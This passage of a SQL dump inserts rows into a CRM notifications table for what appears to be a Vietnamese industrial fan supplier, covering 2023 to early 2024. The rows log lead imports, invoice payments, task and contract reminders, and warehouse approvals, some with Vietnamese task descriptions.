(3144, 1, 1, '2023-03-25 16:08:42', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=194', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3150, 1, 1, '2023-03-25 16:09:20', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=195', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3156, 1, 1, '2023-03-25 16:10:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=196', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3162, 1, 1, '2023-03-25 16:10:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=197', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3176, 1, 1, '2023-03-27 09:19:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=198', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3182, 1, 1, '2023-03-27 09:19:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=199', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3188, 1, 1, '2023-03-27 09:20:14', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=200', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3194, 1, 1, '2023-03-27 09:21:00', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=201', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3200, 1, 1, '2023-03-27 11:56:25', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=202', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3206, 1, 1, '2023-03-27 11:56:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=203', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3212, 1, 1, '2023-03-27 11:57:17', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=204', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3218, 1, 1, '2023-03-27 11:57:43', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=205', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3224, 1, 1, '2023-03-27 11:59:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=206', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3230, 1, 1, '2023-03-27 11:59:48', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=207', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3235, 1, 1, '2023-03-28 08:45:02', 'not_new_reminder_for', 0, 0, '', 1, 1, '', 'a:1:{i:0;s:48:\" - Bao duong bao hanh - Can ve sinh canh quat...\";}'),
(3244, 1, 1, '2023-03-28 10:08:07', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=209', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3250, 1, 1, '2023-03-28 10:08:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=210', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3256, 1, 1, '2023-03-28 10:09:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=211', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3262, 1, 1, '2023-03-28 10:09:56', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=212', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3269, 1, 1, '2023-03-28 13:43:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=213', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3275, 1, 1, '2023-03-28 13:43:53', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=214', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3281, 1, 1, '2023-03-28 13:44:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=215', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3287, 1, 1, '2023-03-28 13:44:42', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=216', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3293, 1, 1, '2023-03-28 13:45:23', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=217', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3299, 1, 1, '2023-03-28 13:46:04', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=218', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3305, 1, 1, '2023-03-28 13:46:59', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=219', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3311, 1, 1, '2023-03-29 09:05:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=220', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3317, 1, 1, '2023-03-29 09:06:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=221', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3323, 1, 1, '2023-03-29 09:06:44', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=222', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3329, 1, 1, '2023-03-29 10:15:07', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=223', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3335, 1, 1, '2023-03-29 10:15:55', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=224', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3341, 1, 1, '2023-03-29 10:16:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=225', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3347, 1, 1, '2023-03-29 10:16:49', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=226', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3353, 1, 1, '2023-03-29 10:17:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=227', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3359, 1, 1, '2023-03-29 10:17:37', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=228', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3365, 1, 1, '2023-03-29 10:18:02', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=229', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3371, 1, 1, '2023-03-30 09:22:30', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=230', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3377, 1, 1, '2023-03-30 09:23:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=231', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3383, 1, 1, '2023-03-30 09:23:50', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=232', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}');
INSERT INTO `tblnotifications` (`id`, `isread`, `isread_inline`, `date`, `description`, `fromuserid`, `fromclientid`, `from_fullname`, `touserid`, `fromcompany`, `link`, `additional_data`) VALUES
(3389, 1, 1, '2023-03-30 09:24:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=233', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3395, 1, 1, '2023-03-30 09:24:58', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=234', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3401, 1, 1, '2023-03-30 09:25:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=235', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3407, 1, 1, '2023-03-30 09:25:51', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=236', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3413, 1, 1, '2023-03-30 09:26:16', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=237', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3419, 1, 1, '2023-03-30 09:26:53', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=238', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3425, 1, 1, '2023-03-30 09:27:40', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=239', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3431, 1, 1, '2023-03-30 09:28:06', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=240', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3437, 1, 1, '2023-03-30 09:29:21', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=241', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3443, 1, 1, '2023-03-31 10:11:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=242', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3449, 1, 1, '2023-03-31 10:11:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=243', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3455, 1, 1, '2023-03-31 10:11:51', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=244', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3461, 1, 1, '2023-03-31 10:12:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=245', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3467, 1, 1, '2023-03-31 10:12:29', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=246', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3481, 1, 1, '2023-03-31 14:28:52', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=247', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3487, 1, 1, '2023-03-31 14:29:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=248', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3493, 1, 1, '2023-03-31 14:29:36', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=249', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3499, 1, 1, '2023-03-31 14:29:56', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=250', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3505, 1, 1, '2023-03-31 14:30:27', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=251', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3510, 1, 1, '2023-04-01 09:34:19', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/272', 'a:1:{i:0;s:10:\"INV-268-23\";}'),
(3511, 1, 1, '2023-04-04 00:00:02', 'not_new_reminder_for', 0, 0, '', 1, 1, '', 'a:1:{i:0;s:48:\" - Bao duong bao hanh - Can ve sinh canh quat...\";}'),
(3538, 1, 1, '2023-04-04 09:23:22', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=252', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3544, 1, 1, '2023-04-04 09:23:48', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=253', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3550, 1, 1, '2023-04-04 09:24:11', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=254', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3556, 1, 1, '2023-04-04 09:24:49', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=255', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3562, 1, 1, '2023-04-04 09:25:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=256', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3568, 1, 1, '2023-04-04 09:25:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=257', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3574, 1, 1, '2023-04-04 09:26:10', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=258', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3580, 1, 1, '2023-04-04 09:53:10', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=259', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3586, 1, 1, '2023-04-05 09:47:21', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=260', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3592, 1, 1, '2023-04-05 09:47:44', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=261', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3598, 1, 1, '2023-04-05 09:48:05', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=262', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3604, 1, 1, '2023-04-05 09:48:23', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=263', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3610, 1, 1, '2023-04-05 13:30:02', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=264', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3616, 1, 1, '2023-04-05 13:30:25', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=265', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3622, 1, 1, '2023-04-05 13:30:55', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=266', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3628, 1, 1, '2023-04-05 13:31:44', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=267', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3634, 1, 1, '2023-04-05 13:32:25', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=268', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3640, 1, 1, '2023-04-05 13:32:50', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=269', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3645, 1, 1, '2023-04-06 01:00:02', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=143', 'a:1:{i:0;s:71:\"Kiểm tra quạt 7062 bị kêu phát ra từ động cơ - Tính phí\";}'),
(3652, 1, 1, '2023-04-06 09:13:59', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=270', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3658, 1, 1, '2023-04-06 09:14:17', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=271', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3664, 1, 1, '2023-04-06 09:14:39', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=272', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3670, 1, 1, '2023-04-06 09:15:13', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=273', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3676, 1, 1, '2023-04-06 09:15:37', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=274', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3682, 1, 1, '2023-04-06 09:15:55', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=275', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3688, 1, 1, '2023-04-06 09:16:19', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=276', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3694, 1, 1, '2023-04-06 09:16:34', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=277', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3700, 1, 1, '2023-04-06 09:16:59', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=278', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3706, 1, 1, '2023-04-06 09:17:21', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=279', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3712, 1, 1, '2023-04-07 09:07:36', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=280', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3718, 1, 1, '2023-04-07 09:07:51', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=281', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3724, 1, 1, '2023-04-07 09:09:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=282', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3730, 1, 1, '2023-04-07 09:09:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=283', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3736, 1, 1, '2023-04-07 09:09:43', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=284', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3742, 1, 1, '2023-04-07 13:53:13', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=285', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3748, 1, 1, '2023-04-07 13:53:28', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=286', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3754, 1, 1, '2023-04-07 13:53:47', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=287', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3760, 1, 1, '2023-04-10 09:04:50', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=288', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3766, 1, 1, '2023-04-10 09:05:23', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=289', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3772, 1, 1, '2023-04-10 09:06:15', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=290', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3778, 1, 1, '2023-04-10 09:06:49', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=291', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3784, 1, 1, '2023-04-10 09:07:09', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=292', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3790, 1, 1, '2023-04-10 09:57:18', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=293', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3796, 1, 1, '2023-04-10 09:57:45', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=294', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3802, 1, 1, '2023-04-10 09:58:23', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=295', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3808, 1, 1, '2023-04-10 09:58:45', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=296', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3814, 1, 1, '2023-04-10 10:01:32', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=297', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3820, 1, 1, '2023-04-10 10:01:54', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=298', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3825, 1, 1, '2023-04-11 00:00:01', 'not_new_reminder_for', 0, 0, '', 1, 1, '', 'a:1:{i:0;s:48:\" - Bao duong bao hanh - Can ve sinh canh quat...\";}'),
(3827, 1, 1, '2023-04-11 09:05:34', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=299', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3833, 1, 1, '2023-04-11 09:06:08', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=300', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3839, 1, 1, '2023-04-11 09:06:36', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=301', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3845, 1, 1, '2023-04-11 09:06:54', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=302', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3851, 1, 1, '2023-04-11 09:07:13', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=303', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3857, 1, 1, '2023-04-11 09:07:35', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=304', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(3916, 1, 1, '2023-04-16 01:00:06', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=144', 'a:1:{i:0;s:80:\"@Luan + Phuc đi khảo sát nhà máy Vĩnh Long - xe oto sáng t3 ( 18/4/2023)\";}'),
(3927, 1, 1, '2023-04-18 00:00:02', 'not_new_reminder_for', 0, 0, '', 1, 1, '', 'a:1:{i:0;s:48:\" - Bao duong bao hanh - Can ve sinh canh quat...\";}'),
(3929, 1, 1, '2023-04-18 01:00:06', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=145', 'a:1:{i:0;s:49:\"@Luân hẹn thời gian lắp đặt cho khách \";}'),
(3982, 1, 1, '2023-04-25 11:09:48', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/268', 'a:1:{i:0;s:10:\"INV-264-23\";}'),
(3998, 1, 1, '2023-05-04 16:00:01', 'not_new_reminder_for', 0, 0, '', 1, 1, 'clients/client/1314', 'a:1:{i:0;s:94:\"Cha Thới - 0858188092 - Hỏi thăm về việc gởi báo giá cho Cha - Thới tại nh...\";}'),
(4009, 1, 1, '2023-05-08 18:20:25', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=310', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(4023, 1, 1, '2023-05-11 12:25:27', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/31', 'a:1:{i:0;s:1:\"1\";}'),
(4024, 1, 1, '2023-05-11 12:25:30', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/31', 'a:1:{i:0;s:1:\"1\";}'),
(4137, 1, 1, '2023-07-06 21:00:02', 'not_contract_expiry_reminder', 0, 0, '', 1, 1, 'contracts/contract/57', 'a:1:{i:0;s:50:\"Hợp đồng mua 10 bộ quạt PS10-24ft - SUNON\";}'),
(4139, 1, 1, '2023-07-11 14:08:52', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/293', 'a:1:{i:0;s:10:\"INV-287-23\";}'),
(4207, 1, 1, '2023-09-20 10:16:10', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=321', 'a:0:{}'),
(4208, 1, 1, '2023-09-20 10:16:10', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=321', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(4212, 1, 1, '2023-09-20 10:38:10', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=322', 'a:0:{}'),
(4213, 1, 1, '2023-09-20 10:38:10', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=322', 'a:1:{i:0;s:28:\"Contractor/TVTK/Design&Build\";}'),
(4225, 1, 1, '2023-09-20 11:49:25', 'not_goal_message_success', 0, 0, '', 1, 1, NULL, 'a:5:{i:0;s:28:\"Chuyển X Khách tìm năng\";i:1;s:1:\"0\";i:2;d:3;i:3;s:10:\"20-09-2023\";i:4;s:10:\"31-12-2023\";}'),
(4228, 1, 1, '2023-09-25 08:42:25', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/323', 'a:1:{i:0;s:10:\"INV-317-23\";}'),
(4231, 1, 1, '2023-10-03 20:43:15', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=323', 'a:0:{}'),
(4232, 1, 1, '2023-10-03 20:43:20', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=323', 'a:1:{i:0;s:20:\"Collect list Contact\";}'),
(4236, 1, 1, '2023-10-03 20:44:17', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=324', 'a:0:{}'),
(4237, 1, 1, '2023-10-03 20:44:17', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=324', 'a:1:{i:0;s:20:\"Collect list Contact\";}'),
(4260, 1, 1, '2023-11-11 21:00:02', 'not_contract_expiry_reminder', 0, 0, '', 1, 1, 'contracts/contract/58', 'a:1:{i:0;s:64:\"Cung cấp lắp đặt 3 quạt trần công nghiệp SUNON S10\";}'),
(4287, 1, 1, '2023-11-23 14:44:26', 'not_estimate_customer_accepted', 0, 0, '', 1, 1, 'estimates/list_estimates/242', 'a:1:{i:0;s:12:\"QUOTE-240-23\";}'),
(4317, 1, 1, '2023-11-29 17:01:00', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/355', 'a:1:{i:0;s:10:\"INV-352-23\";}'),
(4318, 1, 1, '2023-11-30 17:30:01', 'not_new_reminder_for', 0, 0, '', 1, 1, 'proposals/list_proposals/28', 'a:1:{i:0;s:34:\"PRO-28 - Kiểm tra đơn hàng...\";}'),
(4336, 1, 1, '2023-12-18 10:41:21', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/366', 'a:1:{i:0;s:10:\"INV-355-23\";}'),
(4337, 1, 1, '2023-12-21 16:14:20', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/373', 'a:1:{i:0;s:10:\"INV-363-23\";}'),
(4420, 1, 1, '2024-01-24 09:11:14', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/1', 'a:1:{i:0;s:1:\"1\";}'),
(4421, 1, 1, '2024-01-24 09:11:24', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/1', 'a:1:{i:0;s:1:\"1\";}'),
(4422, 1, 1, '2024-01-24 17:22:21', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'payments/payment/395', 'a:1:{i:0;s:10:\"INV-382-23\";}'),
(4424, 1, 1, '2024-01-26 14:42:30', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/3', 'a:1:{i:0;s:1:\"2\";}'),
(4427, 1, 1, '2024-01-27 01:00:04', 'not_task_deadline_reminder', 0, 0, '', 1, 1, '#taskid=159', 'a:1:{i:0;s:81:\"Fix lịch lắp đặt ngày 23/1 - Lắp 3 quạt nhà C.Thanh + A.Đồng - Q7\";}'),
(4431, 1, 1, '2024-01-27 08:25:18', 'not_task_marked_as_complete', 17, 0, 'Loan Nguyễn', 1, NULL, '#taskid=159', 'a:1:{i:0;s:81:\"Fix lịch lắp đặt ngày 23/1 - Lắp 3 quạt nhà C.Thanh + A.Đồng - Q7\";}'),
(4437, 1, 1, '2024-01-29 21:33:12', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=329', 'a:0:{}'),
(4438, 1, 1, '2024-01-29 21:33:12', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=329', 'a:1:{i:0;s:20:\"Collect list Contact\";}'),
(4441, 1, 1, '2024-01-29 21:53:46', 'not_lead_assigned_from_form', 0, 0, '', 1, 1, '#leadid=330', 'a:0:{}'),
(4442, 1, 1, '2024-01-29 21:53:46', 'not_lead_imported_from_form', 0, 0, '', 1, 1, '#leadid=330', 'a:1:{i:0;s:16:\"Form_HamiltonAir\";}'),
